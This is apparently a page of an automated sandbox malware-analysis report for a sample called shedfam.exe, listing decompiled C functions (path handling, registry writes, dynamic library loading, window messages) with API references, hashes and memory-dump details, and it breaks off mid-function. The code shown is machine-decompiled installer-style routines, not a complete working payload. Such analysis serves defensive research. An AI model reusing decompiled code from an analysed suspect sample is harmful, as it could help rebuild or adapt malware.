Function 00405882 Relevance: 7.5, APIs: 3, Strings: 2, Instructions: 36
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405882(char _a4) {
				CHAR* _t3;
				char* _t5;
				CHAR* _t7;
				CHAR* _t8;
				void* _t10;

				_t1 =  &_a4; // 0x405634
				_t8 =  *_t1;
				_t7 = CharNextA(_t8);
				_t3 = CharNextA(_t7);
				if( *_t8 == 0 ||  *_t7 != 0x5c3a) {
					if( *_t8 != 0x5c5c) {
						L8:
						return 0;
					}
					_t10 = 2;
					while(1) {
						_t10 = _t10 - 1;
						_t5 = E00405819(_t3, 0x5c);
						if( *_t5 == 0) {
							goto L8;
						}
						_t3 = _t5 + 1;
						if(_t10 != 0) {
							continue;
						}
						return _t3;
					}
					goto L8;
				} else {
					return CharNextA(_t3);
				}
			}

0x0040588b
0x0040588b
0x00405892
0x00405895
0x0040589a
0x004058ad
0x004058c7
0x00000000
0x004058c7
0x004058b1
0x004058b2
0x004058b5
0x004058b6
0x004058be
0x00000000
0x00000000
0x004058c0
0x004058c3
0x00000000
0x00000000
0x00000000
0x004058c3
0x00000000
0x004058a3
0x00000000
0x004058a4

APIs

CharNextA.USER32(4V@,?,C:\,00000000,004058E6,C:\,C:\,?,?,74D0F560,00405634,?,C:\Users\user\AppData\Local\Temp\,74D0F560), ref: 00405890
CharNextA.USER32(00000000), ref: 00405895
CharNextA.USER32(00000000), ref: 004058A4

Strings

C:\, xrefs: 00405883
4V@, xrefs: 0040588B, 0040588F

Memory Dump Source

Source File: 00000000.00000002.257281468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.257256064.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257318535.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257326105.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257337622.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257354953.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257362306.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257368418.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_shedfam.jbxd

Similarity

API ID: CharNext
String ID: 4V@$C:\
API String ID: 3213498283-1503405514
Opcode ID: c58660fb0bf1ba28bd125fae111134e2cdebdf6cff54c8abe05387ea08842000
Instruction ID: c672ca698b2e1da82c16c1c95d0afa497de5c4bc474b1e42a417a68fd1ebbade
Opcode Fuzzy Hash: c58660fb0bf1ba28bd125fae111134e2cdebdf6cff54c8abe05387ea08842000
Instruction Fuzzy Hash: 65F0A753954F2155F72232644C44B7B5BACDF55711F14C47BE900F61D182BC5CB28FAA

Uniqueness

Uniqueness Score: -1.00%

Function 004047AC Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84
stringCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E004047AC(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
				char _v36;
				char _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t21;
				signed int _t22;
				void* _t29;
				void* _t31;
				void* _t32;
				void* _t41;
				signed int _t43;
				signed int _t47;
				signed int _t50;
				signed int _t51;
				signed int _t53;

				_t21 = _a16;
				_t51 = _a12;
				_t41 = 0xffffffdc;
				if(_t21 == 0) {
					_push(0x14);
					_pop(0);
					_t22 = _t51;
					if(_t51 < 0x100000) {
						_push(0xa);
						_pop(0);
						_t41 = 0xffffffdd;
					}
					if(_t51 < 0x400) {
						_t41 = 0xffffffde;
					}
					if(_t51 < 0xffff3333) {
						_t50 = 0x14;
						asm("cdq");
						_t22 = 1 / _t50 + _t51;
					}
					_t23 = _t22 & 0x00ffffff;
					_t53 = _t22 >> 0;
					_t43 = 0xa;
					_t47 = ((_t22 & 0x00ffffff) + _t23 * 4 + (_t22 & 0x00ffffff) + _t23 * 4 >> 0) % _t43;
				} else {
					_t53 = (_t21 << 0x00000020 | _t51) >> 0x14;
					_t47 = 0;
				}
				_t29 = E00405D1D(_t41, _t47, _t53,  &_v36, 0xffffffdf);
				_t31 = E00405D1D(_t41, _t47, _t53,  &_v68, _t41);
				_t32 = E00405D1D(_t41, _t47, 0x420580, 0x420580, _a8);
				wsprintfA(_t32 + lstrlenA(0x420580), "%u.%u%s%s", _t53, _t47, _t31, _t29);
				return SetDlgItemTextA( *0x423758, _a4, 0x420580);
			}

0x004047b2
0x004047b7
0x004047bf
0x004047c0
0x004047cd
0x004047d5
0x004047d6
0x004047d8
0x004047da
0x004047dc
0x004047df
0x004047df
0x004047e6
0x004047ec
0x004047ec
0x004047f3
0x004047fa
0x004047fd
0x00404800
0x00404800
0x00404804
0x00404814
0x00404816
0x00404819
0x004047c2
0x004047c2
0x004047c9
0x004047c9
0x00404821
0x0040482c
0x00404842
0x00404852
0x0040486e

APIs

lstrlenA.KERNEL32(00420580,00420580,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004046C7,000000DF,00000000,00000400,?), ref: 0040484A
wsprintfA.USER32 ref: 00404852
SetDlgItemTextA.USER32 ref: 00404865

Strings

%u.%u%s%s, xrefs: 00404834

Memory Dump Source

Source File: 00000000.00000002.257281468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.257256064.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257318535.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257326105.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257337622.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257354953.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257362306.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257368418.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_shedfam.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s
API String ID: 3540041739-3551169577
Opcode ID: 79547ab418726b7bf4084acddcdfde422701d950c1d0e95393f539214d427545
Instruction ID: 71df96092b2c0d2c51d4f9b386e12500524326f2c654dceed31374545f8d5b50
Opcode Fuzzy Hash: 79547ab418726b7bf4084acddcdfde422701d950c1d0e95393f539214d427545
Instruction Fuzzy Hash: C411E77364412437DB0075699C46EAF3299DFC6374F244637FA25F31D2EA788C5285AC

Uniqueness

Uniqueness Score: -1.00%

Function 00401BAD Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76
windowtimeCOMMON

Download Yara Rule

C-Code - Quality: 51%

			E00401BAD() {
				signed int _t28;
				CHAR* _t31;
				long _t32;
				int _t37;
				signed int _t38;
				int _t42;
				int _t48;
				struct HWND__* _t52;
				void* _t55;

				 *(_t55 - 8) = E004029EF(3);
				 *(_t55 + 8) = E004029EF(4);
				if(( *(_t55 - 0x14) & 0x00000001) != 0) {
					 *((intOrPtr*)(__ebp - 8)) = E00402A0C(0x33);
				}
				__eflags =  *(_t55 - 0x14) & 0x00000002;
				if(( *(_t55 - 0x14) & 0x00000002) != 0) {
					 *(_t55 + 8) = E00402A0C(0x44);
				}
				__eflags =  *((intOrPtr*)(_t55 - 0x2c)) - 0x21;
				_push(1);
				if(__eflags != 0) {
					_t50 = E00402A0C();
					_t28 = E00402A0C();
					asm("sbb ecx, ecx");
					asm("sbb eax, eax");
					_t31 =  ~( *_t27) & _t50;
					__eflags = _t31;
					_t32 = FindWindowExA( *(_t55 - 8),  *(_t55 + 8), _t31,  ~( *_t28) & _t28);
					goto L10;
				} else {
					_t52 = E004029EF();
					_t37 = E004029EF();
					_t48 =  *(_t55 - 0x14) >> 2;
					if(__eflags == 0) {
						_t32 = SendMessageA(_t52, _t37,  *(_t55 - 8),  *(_t55 + 8));
						L10:
						 *(_t55 - 0xc) = _t32;
					} else {
						_t38 = SendMessageTimeoutA(_t52, _t37,  *(_t55 - 8),  *(_t55 + 8), _t42, _t48, _t55 - 0xc);
						asm("sbb eax, eax");
						 *((intOrPtr*)(_t55 - 4)) =  ~_t38 + 1;
					}
				}
				__eflags =  *((intOrPtr*)(_t55 - 0x28)) - _t42;
				if( *((intOrPtr*)(_t55 - 0x28)) >= _t42) {
					_push( *(_t55 - 0xc));
					E00405C59();
				}
				 *0x424008 =  *0x424008 +  *((intOrPtr*)(_t55 - 4));
				return 0;
			}

0x00401bb6
0x00401bc2
0x00401bc5
0x00401bce
0x00401bce
0x00401bd1
0x00401bd5
0x00401bde
0x00401bde
0x00401be1
0x00401be5
0x00401be7
0x00401c34
0x00401c36
0x00401c3f
0x00401c47
0x00401c4a
0x00401c4a
0x00401c53
0x00000000
0x00401be9
0x00401bf0
0x00401bf2
0x00401bfa
0x00401bfd
0x00401c25
0x00401c59
0x00401c59
0x00401bff
0x00401c0d
0x00401c15
0x00401c18
0x00401c18
0x00401bfd
0x00401c5c
0x00401c5f
0x00401c65
0x00402849
0x00402849
0x004028a4
0x004028b0

APIs

SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C0D
SendMessageA.USER32 ref: 00401C25

Strings

!, xrefs: 00401BE1

Memory Dump Source

Source File: 00000000.00000002.257281468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.257256064.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257318535.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257326105.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257337622.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257354953.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257362306.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257368418.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_shedfam.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: ffe6b110ca1c73326c48dab4d0f6c0cda1bf7de6d6394e86224bb1024c2cbccb
Instruction ID: 0d48d80f5befc11ac34d32cc8383790a8c4c8cfd5038d7f43494ad221661d07c
Opcode Fuzzy Hash: ffe6b110ca1c73326c48dab4d0f6c0cda1bf7de6d6394e86224bb1024c2cbccb
Instruction Fuzzy Hash: 4D217471A44248BFEF01AFB4CD8AAAE7B75EF44344F14417AF501B61D1D6788940DB19

Uniqueness

Uniqueness Score: -1.00%

Function 004057EE Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004057EE(CHAR* _a4) {
				CHAR* _t7;

				_t7 = _a4;
				if( *(CharPrevA(_t7,  &(_t7[lstrlenA(_t7)]))) != 0x5c) {
					lstrcatA(_t7, 0x409010);
				}
				return _t7;
			}

0x004057ef
0x00405806
0x0040580e
0x0040580e
0x00405816

APIs

lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040323C,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004033DB), ref: 004057F4
CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040323C,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004033DB), ref: 004057FD
lstrcatA.KERNEL32(?,00409010), ref: 0040580E

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 004057EE

Memory Dump Source

Source File: 00000000.00000002.257281468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.257256064.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257318535.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257326105.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257337622.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257354953.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257362306.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257368418.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_shedfam.jbxd

Similarity

API ID: CharPrevlstrcatlstrlen
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 2659869361-3916508600
Opcode ID: f17b2ccdaa8efd10834e0f4341d4d5b977b2bb6e8559feba5c8cad9ccc1df0ef
Instruction ID: a73f37ca2c4469ddb4ae9c1577b37cdaede3e1835012dc8acebf0dfdd4a4e987
Opcode Fuzzy Hash: f17b2ccdaa8efd10834e0f4341d4d5b977b2bb6e8559feba5c8cad9ccc1df0ef
Instruction Fuzzy Hash: 86D0A962615A703EE21236559C09F8B2A0CCF82700B14C833F600B22E2C63C5D41CFFE

Uniqueness

Uniqueness Score: -1.00%

Function 00401F67 Relevance: 6.1, APIs: 4, Instructions: 73
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 59%

			E00401F67(void* __ebx, void* __eflags) {
				void* _t27;
				struct HINSTANCE__* _t30;
				CHAR* _t32;
				intOrPtr* _t33;
				void* _t34;

				_t27 = __ebx;
				asm("sbb eax, 0x424038");
				 *(_t34 - 4) = 1;
				if(__eflags < 0) {
					_push(0xffffffe7);
					L15:
					E00401423();
					L16:
					 *0x424008 =  *0x424008 +  *(_t34 - 4);
					return 0;
				}
				_t32 = E00402A0C(0xfffffff0);
				 *(_t34 + 8) = E00402A0C(1);
				if( *((intOrPtr*)(_t34 - 0x18)) == __ebx) {
					L3:
					_t30 = LoadLibraryExA(_t32, _t27, 8);
					if(_t30 == _t27) {
						_push(0xfffffff6);
						goto L15;
					}
					L4:
					_t33 = GetProcAddress(_t30,  *(_t34 + 8));
					if(_t33 == _t27) {
						E00404FE7(0xfffffff7,  *(_t34 + 8));
					} else {
						 *(_t34 - 4) = _t27;
						if( *((intOrPtr*)(_t34 - 0x20)) == _t27) {
							 *_t33( *((intOrPtr*)(_t34 - 8)), 0x400, 0x425000, 0x40b050, 0x409000);
						} else {
							E00401423( *((intOrPtr*)(_t34 - 0x20)));
							if( *_t33() != 0) {
								 *(_t34 - 4) = 1;
							}
						}
					}
					if( *((intOrPtr*)(_t34 - 0x1c)) == _t27 && E004036EE(_t30) != 0) {
						FreeLibrary(_t30);
					}
					goto L16;
				}
				_t30 = GetModuleHandleA(_t32);
				if(_t30 != __ebx) {
					goto L4;
				}
				goto L3;
			}

0x00401f67
0x00401f67
0x00401f6c
0x00401f73
0x0040202f
0x0040217a
0x0040217a
0x004028a1
0x004028a4
0x004028b0
0x004028b0
0x00401f82
0x00401f8c
0x00401f8f
0x00401f9e
0x00401fa8
0x00401fac
0x00402028
0x00000000
0x00402028
0x00401fae
0x00401fb8
0x00401fbc
0x00402000
0x00401fbe
0x00401fc1
0x00401fc4
0x00401ff4
0x00401fc6
0x00401fc9
0x00401fd2
0x00401fd4
0x00401fd4
0x00401fd2
0x00401fc4
0x00402008
0x0040201d
0x0040201d
0x00000000
0x00402008
0x00401f98
0x00401f9c
0x00000000
0x00000000
0x00000000

APIs

GetModuleHandleA.KERNEL32(00000000,00000001,000000F0), ref: 00401F92

Part of subcall function 00404FE7: lstrlenA.KERNEL32(0041FD58,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C60,00000000,?), ref: 00405020
Part of subcall function 00404FE7: lstrlenA.KERNEL32(00402C60,0041FD58,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C60,00000000), ref: 00405030
Part of subcall function 00404FE7: lstrcatA.KERNEL32(0041FD58,00402C60,00402C60,0041FD58,00000000,00000000,00000000), ref: 00405043
Part of subcall function 00404FE7: SetWindowTextA.USER32(0041FD58,0041FD58), ref: 00405055
Part of subcall function 00404FE7: SendMessageA.USER32 ref: 0040507B
Part of subcall function 00404FE7: SendMessageA.USER32 ref: 00405095
Part of subcall function 00404FE7: SendMessageA.USER32 ref: 004050A3

LoadLibraryExA.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 00401FA2
GetProcAddress.KERNEL32(00000000,?), ref: 00401FB2
FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 0040201D

Memory Dump Source

Source File: 00000000.00000002.257281468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.257256064.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257318535.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257326105.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257337622.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257354953.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257362306.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257368418.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_shedfam.jbxd

Similarity

API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
String ID:
API String ID: 2987980305-0
Opcode ID: 7fb9b226615727d3441864a5fc6923e543d9c096b6fd48025687a41fa8be44d0
Instruction ID: 03d8e5a468c8d4f9f4276292500c9ce54345415f5676ade893a4261965153270
Opcode Fuzzy Hash: 7fb9b226615727d3441864a5fc6923e543d9c096b6fd48025687a41fa8be44d0
Instruction Fuzzy Hash: 8E210B32904115BBDF207F65CE8CA6E39B1BF44358F20423BF601B62D0DBBD49419A5E

Uniqueness

Uniqueness Score: -1.00%

Function 00402319 Relevance: 6.1, APIs: 4, Instructions: 71
registrystringCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E00402319(void* __eax) {
				void* _t15;
				char* _t18;
				int _t19;
				char _t24;
				int _t27;
				intOrPtr _t35;
				void* _t37;

				_t15 = E00402B01(__eax);
				_t35 =  *((intOrPtr*)(_t37 - 0x18));
				 *(_t37 - 0x34) =  *(_t37 - 0x14);
				 *(_t37 - 0x38) = E00402A0C(2);
				_t18 = E00402A0C(0x11);
				_t31 =  *0x424030 | 0x00000002;
				 *(_t37 - 4) = 1;
				_t19 = RegCreateKeyExA(_t15, _t18, _t27, _t27, _t27,  *0x424030 | 0x00000002, _t27, _t37 + 8, _t27);
				if(_t19 == 0) {
					if(_t35 == 1) {
						E00402A0C(0x23);
						_t19 = lstrlenA(0x40a450) + 1;
					}
					if(_t35 == 4) {
						_t24 = E004029EF(3);
						 *0x40a450 = _t24;
						_t19 = _t35;
					}
					if(_t35 == 3) {
						_t19 = E00402F2E(_t31,  *((intOrPtr*)(_t37 - 0x1c)), _t27, 0x40a450, 0xc00);
					}
					if(RegSetValueExA( *(_t37 + 8),  *(_t37 - 0x38), _t27,  *(_t37 - 0x34), 0x40a450, _t19) == 0) {
						 *(_t37 - 4) = _t27;
					}
					_push( *(_t37 + 8));
					RegCloseKey();
				}
				 *0x424008 =  *0x424008 +  *(_t37 - 4);
				return 0;
			}

0x0040231a
0x0040231f
0x00402329
0x00402333
0x00402336
0x00402346
0x00402350
0x00402357
0x0040235f
0x0040236d
0x00402371
0x0040237c
0x0040237c
0x00402380
0x00402384
0x0040238a
0x0040238f
0x0040238f
0x00402393
0x0040239f
0x0040239f
0x004023b8
0x004023ba
0x004023ba
0x004023bd
0x00402493
0x00402493
0x004028a4
0x004028b0

APIs

RegCreateKeyExA.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402357
lstrlenA.KERNEL32(0040A450,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 00402377
RegSetValueExA.ADVAPI32(?,?,?,?,0040A450,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023B0
RegCloseKey.ADVAPI32(?,?,?,0040A450,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402493

Memory Dump Source

Source File: 00000000.00000002.257281468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.257256064.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257318535.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257326105.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257337622.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257354953.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257362306.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257368418.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_shedfam.jbxd

Similarity

API ID: CloseCreateValuelstrlen
String ID:
API String ID: 1356686001-0
Opcode ID: 095443195063697bdd456d4cd3d43ce86eee03aab12c67eea5854480753a1108
Instruction ID: ad8ea78d7240695516c5cd5a42f81e191ab97329ebd365d047bf213c76e9c1da
Opcode Fuzzy Hash: 095443195063697bdd456d4cd3d43ce86eee03aab12c67eea5854480753a1108
Instruction Fuzzy Hash: 14113071E00108BEEB10EFB5DE8DEAF7A79EB40358F10403AF905B61D1D6B85D419A69

Uniqueness

Uniqueness Score: -1.00%

Function 00401D1B Relevance: 6.0, APIs: 4, Instructions: 34
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E00401D1B() {
				void* __esi;
				int _t6;
				signed char _t11;
				struct HFONT__* _t14;
				void* _t18;
				void* _t24;
				void* _t26;
				void* _t28;

				_t6 = GetDeviceCaps(GetDC( *(_t28 - 8)), 0x5a);
				0x40b054->lfHeight =  ~(MulDiv(E004029EF(2), _t6, 0x48));
				 *0x40b064 = E004029EF(3);
				_t11 =  *((intOrPtr*)(_t28 - 0x18));
				 *0x40b06b = 1;
				 *0x40b068 = _t11 & 0x00000001;
				 *0x40b069 = _t11 & 0x00000002;
				 *0x40b06a = _t11 & 0x00000004;
				E00405D1D(_t18, _t24, _t26, 0x40b070,  *((intOrPtr*)(_t28 - 0x24)));
				_t14 = CreateFontIndirectA(0x40b054);
				_push(_t14);
				_push(_t26);
				E00405C59();
				 *0x424008 =  *0x424008 +  *((intOrPtr*)(_t28 - 4));
				return 0;
			}

0x00401d29
0x00401d42
0x00401d4c
0x00401d51
0x00401d5c
0x00401d63
0x00401d75
0x00401d7b
0x00401d80
0x00401d8a
0x004024ce
0x00401561
0x00402849
0x004028a4
0x004028b0

APIs

GetDC.USER32(?), ref: 00401D22
GetDeviceCaps.GDI32(00000000), ref: 00401D29
MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D38
CreateFontIndirectA.GDI32(0040B054), ref: 00401D8A

Memory Dump Source

Source File: 00000000.00000002.257281468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.257256064.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257318535.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257326105.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257337622.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257354953.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257362306.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257368418.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_shedfam.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirect
String ID:
API String ID: 3272661963-0
Opcode ID: 8e548603e350ce1a89f038fa1766b34cdc841b1a5af396ce190c880d9480c0eb
Instruction ID: c086b606221abe62c4a5ea5e4ce8852375084165fd0064a8092653b5abcc508f
Opcode Fuzzy Hash: 8e548603e350ce1a89f038fa1766b34cdc841b1a5af396ce190c880d9480c0eb
Instruction Fuzzy Hash: FAF04471A48240AEE70167709E0AB9B3F64D715305F104476B251B62F2C7790444CBAE

Uniqueness

Uniqueness Score: -1.00%

Function 00403A17 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 71
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403A17(void* __ecx, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short _t6;
				intOrPtr _t11;
				signed int _t13;
				signed int _t16;
				signed short* _t18;
				signed int _t20;
				signed short* _t23;
				intOrPtr _t25;
				signed int _t26;
				intOrPtr* _t27;

				_t24 = "1033";
				_t13 = 0xffff;
				_t6 = E00405C72(__ecx, "1033");
				while(1) {
					_t26 =  *0x423fc4;
					if(_t26 == 0) {
						goto L7;
					}
					_t16 =  *( *0x423f90 + 0x64);
					_t20 =  ~_t16;
					_t18 = _t16 * _t26 +  *0x423fc0;
					while(1) {
						_t18 = _t18 + _t20;
						_t26 = _t26 - 1;
						if((( *_t18 ^ _t6) & _t13) == 0) {
							break;
						}
						if(_t26 != 0) {
							continue;
						}
						goto L7;
					}
					 *0x423760 = _t18[1];
					 *0x424028 = _t18[3];
					_t23 =  &(_t18[5]);
					if(_t23 != 0) {
						 *0x42375c = _t23;
						E00405C59(_t24,  *_t18 & 0x0000ffff);
						SetWindowTextA( *0x420558, E00405D1D(_t13, _t24, _t26, 0x423780, 0xfffffffe));
						_t11 =  *0x423fac;
						_t27 =  *0x423fa8;
						if(_t11 == 0) {
							L15:
							return _t11;
						}
						_t25 = _t11;
						do {
							_t11 =  *_t27;
							if(_t11 != 0) {
								_t11 = E00405D1D(_t13, _t25, _t27, _t27 + 0x18, _t11);
							}
							_t27 = _t27 + 0x418;
							_t25 = _t25 - 1;
						} while (_t25 != 0);
						goto L15;
					}
					L7:
					if(_t13 != 0xffff) {
						_t13 = 0;
					} else {
						_t13 = 0x3ff;
					}
				}
			}

0x00403a1b
0x00403a20
0x00403a26
0x00403a2b
0x00403a2b
0x00403a33
0x00000000
0x00000000
0x00403a3b
0x00403a43
0x00403a45
0x00403a4b
0x00403a4b
0x00403a4d
0x00403a59
0x00000000
0x00000000
0x00403a5d
0x00000000
0x00000000
0x00000000
0x00403a5f
0x00403a64
0x00403a6d
0x00403a73
0x00403a78
0x00403a8c
0x00403a97
0x00403aaf
0x00403ab5
0x00403aba
0x00403ac2
0x00403ae3
0x00403ae3
0x00403ae3
0x00403ac4
0x00403ac6
0x00403ac6
0x00403aca
0x00403ad1
0x00403ad1
0x00403ad6
0x00403adc
0x00403adc
0x00000000
0x00403ac6
0x00403a7a
0x00403a7f
0x00403a88
0x00403a81
0x00403a81
0x00403a81
0x00403a7f

APIs

SetWindowTextA.USER32(00000000,00423780), ref: 00403AAF

Strings

1033, xrefs: 00403A1B, 00403A25, 00403A96
"C:\Users\user\Desktop\shedfam.exe", xrefs: 00403A18

Memory Dump Source

Source File: 00000000.00000002.257281468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.257256064.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257318535.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257326105.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257337622.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257354953.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257362306.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257368418.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_shedfam.jbxd

Similarity

API ID: TextWindow
String ID: "C:\Users\user\Desktop\shedfam.exe"$1033
API String ID: 530164218-620422693
Opcode ID: bde8280c9c770d58924a074a3110f1818d19584ed3810c5b524036327c9d2aac
Instruction ID: d2f26ffd722b9fc2ec01e0f6875488dfbe0f51797c7981412bd9696a178e6430
Opcode Fuzzy Hash: bde8280c9c770d58924a074a3110f1818d19584ed3810c5b524036327c9d2aac
Instruction Fuzzy Hash: D511D071B00201ABC720EF149C80A373BA8EB85716369813BE841A73A0D73D9A028E58

Uniqueness

Uniqueness Score: -1.00%

Function 00404F37 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404F37(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				long _t22;

				if(_a8 != 0x102) {
					if(_a8 != 0x200) {
						_t22 = _a16;
						L7:
						if(_a8 == 0x419 &&  *0x420568 != _t22) {
							 *0x420568 = _t22;
